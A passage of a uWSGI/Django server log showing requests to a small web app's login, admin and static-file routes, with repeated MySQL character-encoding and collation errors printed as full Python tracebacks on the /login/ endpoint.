2021] POST /my-admin/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 68/107] 219.228.146.146 () {40 vars in 897 bytes} [Thu Jan 14 07:43:19 2021] GET /admin-home => generated 0 bytes in 11 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 68/108] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:19 2021] POST /login/ => generated 209413 bytes in 122 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 69/109] 219.228.146.146 () {40 vars in 899 bytes} [Thu Jan 14 07:43:19 2021] GET /admin-home/ => generated 6515 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/110] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:43:19 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/111] 219.228.146.146 () {38 vars in 767 bytes} [Thu Jan 14 07:43:19 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/112] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:43:19 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/113] 219.228.146.146 () {38 vars in 796 bytes} [Thu Jan 14 07:43:19 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/114] 219.228.146.146 () {38 vars in 808 bytes} [Thu Jan 14 07:43:19 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/115] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:43:19 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/116] 219.228.146.146 () {38 vars in 772 bytes} [Thu Jan 14 07:43:20 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/117] 219.228.146.146 () {38 vars in 748 bytes} [Thu Jan 14 07:43:20 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/118] 219.228.146.146 () {38 vars in 760 bytes} [Thu Jan 14 07:43:20 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/119] 219.228.146.146 () {38 vars in 836 bytes} [Thu Jan 14 07:43:20 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/120] 219.228.146.146 () {38 vars in 758 bytes} [Thu Jan 14 07:43:20 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/121] 219.228.146.146 () {38 vars in 832 bytes} [Thu Jan 14 07:43:21 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 70/122] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 71/123] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 72/124] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 73/125] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 74/126] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 75/127] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 76/128] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:43:22 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 77/129] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:43:22 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 78/130] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:43:22 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/131] 219.228.146.253 () {38 vars in 815 bytes} [Thu Jan 14 07:43:25 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 79/132] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:31 2021] POST /login/ => generated 209413 bytes in 100 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 80/133] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:40 2021] POST /login/ => generated 209413 bytes in 107 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 81/134] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:41 2021] POST /login/ => generated 183350 bytes in 89 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 82/135] 219.228.146.146 () {40 vars in 892 bytes} [Thu Jan 14 07:43:47 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File 